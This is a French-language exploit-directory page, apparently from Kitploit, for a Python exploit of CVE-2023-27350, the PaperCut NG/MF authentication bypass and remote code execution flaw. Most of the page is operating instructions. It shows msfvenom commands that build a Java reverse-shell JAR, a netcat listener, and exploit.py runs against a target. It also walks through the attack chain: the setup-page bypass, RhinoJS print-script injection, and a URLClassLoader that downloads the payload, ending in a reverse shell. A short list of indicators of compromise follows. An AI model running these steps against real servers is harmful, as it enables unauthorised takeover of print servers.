Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PaperCut-Authentication_Bypass_and_RCE — Cet exploit est basé sur CVE-2023-27350 et a été construit sur l'exploit original par horizon3ai et le module Metasploit. | Kitploit
Outils/GitHubGitHub/joaoaugustom/papercut-authentication_bypass_and_rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et ÉducationOutil d'Accès à Distance
GitHub
joaoaugustom/papercut-authentication_bypass_and_rce

PaperCut-Authentication_Bypass_and_RCE

Cet exploit est basé sur CVE-2023-27350 et a été construit sur l'exploit original par horizon3ai et le module Metasploit.

Voir le dépôt
2il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-27350 — Contournement d'authentification et RCE PaperCut NG/MF

Exploit Python autonome pour la vulnérabilité critique de contournement d'authentification et d'exécution de code à distance dans PaperCut NG/MF. CVSS 9.8.

Description

CVE-2023-27350 affecte PaperCut NG et MF dans les versions antérieures à 20.1.7, 21.2.11 et 22.0.9. La faille permet à un attaquant non authentifié d'accéder au point de terminaison /app?service=page/SetupCompleted — une page de configuration destinée à n'être accessible que lors de l'installation initiale — et d'obtenir une session administrative valide sans aucune information d'identification.

Avec un accès administrateur, l'attaquant peut activer le mécanisme de script d'impression de PaperCut et injecter du code arbitraire exécuté par la JVM du serveur, conduisant à une RCE complète dans le contexte de l'utilisateur du service.

Versions affectées

BrancheVersion corrigée
20.x20.1.7
21.x21.2.11
22.x22.0.9

Les versions 18.x et antérieures n'ont reçu aucun correctif officiel.

Implémentations de référence

Cet exploit a été développé à partir de l'analyse de deux implémentations publiques :

1. horizon3ai/CVE-2023-27350 (Python)

  • Dépôt : https://github.com/horizon3ai/CVE-2023-27350
  • Approche : utilise Runtime.exec() avec une chaîne simple pour exécuter des commandes
  • Limitations : Runtime.exec(String) ne traite pas les métacaractères du shell (>&, |, 0>&1), rendant les charges utiles de reverse shell inefficaces. Le script code également en dur l'ID de l'imprimante (l1001) et vérifie les chaînes de succès en anglais uniquement, échouant sur les instances non anglaises.
  • Hypothèse de moteur incorrecte : ne tient pas compte du fait que PaperCut utilise RhinoJS (et non BeanShell), ce qui provoque des erreurs de syntaxe dans certaines charges utiles Java.

2. rapid7/metasploit-framework — PaperCutNG Authentication Bypass

  • Module : exploit/multi/http/papercut_ng_rce
  • Approche : charge un JAR Metasploit dans la JVM via URLClassLoader, évitant toute dépendance shell.
  • Limitations : nécessite le framework Metasploit complet et génère une charge utile Java/Meterpreter ; pas facilement adaptable pour une utilisation autonome avec nc.

Prérequis

root@kitploit:~
Python 3.x
requests
msfvenom (part of Metasploit Framework)
nc (netcat)
root@kitploit:~
pip install requests

Utilisation

1. Générer la charge utile JAR

root@kitploit:~
msfvenom -p java/shell_reverse_tcp \
  LHOST=<YOUR_IP> LPORT=<SHELL_PORT> \
  -f jar -o payload.jar

2. Démarrer un écouteur

root@kitploit:~
nc -lvnp <SHELL_PORT>

3. Exécuter l'exploit

root@kitploit:~
python exploit.py \
  -u http://<TARGET>:9191 \
  -j payload.jar \
  -lh <YOUR_IP> \
  -lp <HTTP_PORT> \
  -rp <SHELL_PORT>

Exemple :

root@kitploit:~
python exploit.py \
  -u http://192.168.1.100:9191 \
  -j payload.jar \
  -lh 192.168.1.10 \
  -lp 9090 \
  -rp 4444

Paramètres

ParamètreDescriptionValeur par défaut
-u / --urlURL de base de PaperCutrequis
-j / --jarChemin vers payload.jarrequis
-lh / --lhostVotre IP (la cible se connectera ici)requis
-lp / --lportPort HTTP pour servir le JAR9090
-rp / --rportPort du reverse shell4444

Comment ça fonctionne

root@kitploit:~
1. Auth bypass via /app?service=page/SetupCompleted
        ↓
2. Obtain admin JSESSIONID without credentials
        ↓
3. Select [Template Printer] (l1001)
        ↓
4. Inject RhinoJS script into the print script field
        ↓
5. Script creates a URLClassLoader pointing to our HTTP server
        ↓
6. PaperCut JVM downloads and executes payload.jar
        ↓
7. Reverse shell

Indicateurs de compromission (IoC)

  • Accès à /app?service=page/SetupCompleted sans session préalable
  • Modification des paramètres print-and-device.script.enabled et print.script.sandboxed (versions >= 19)
  • Connexion HTTP sortante du serveur PaperCut vers une IP externe
  • Instanciation de URLClassLoader avec une URL externe dans les logs JVM

Avertissement légal

Cet exploit est fourni à des fins éducatives et pour une utilisation autorisée uniquement (tests d'intrusion, CTF, environnements de laboratoire). L'utilisation non autorisée contre des systèmes sans permission explicite est illégale. L'auteur n'est pas responsable de toute mauvaise utilisation.

Télécharger l’outil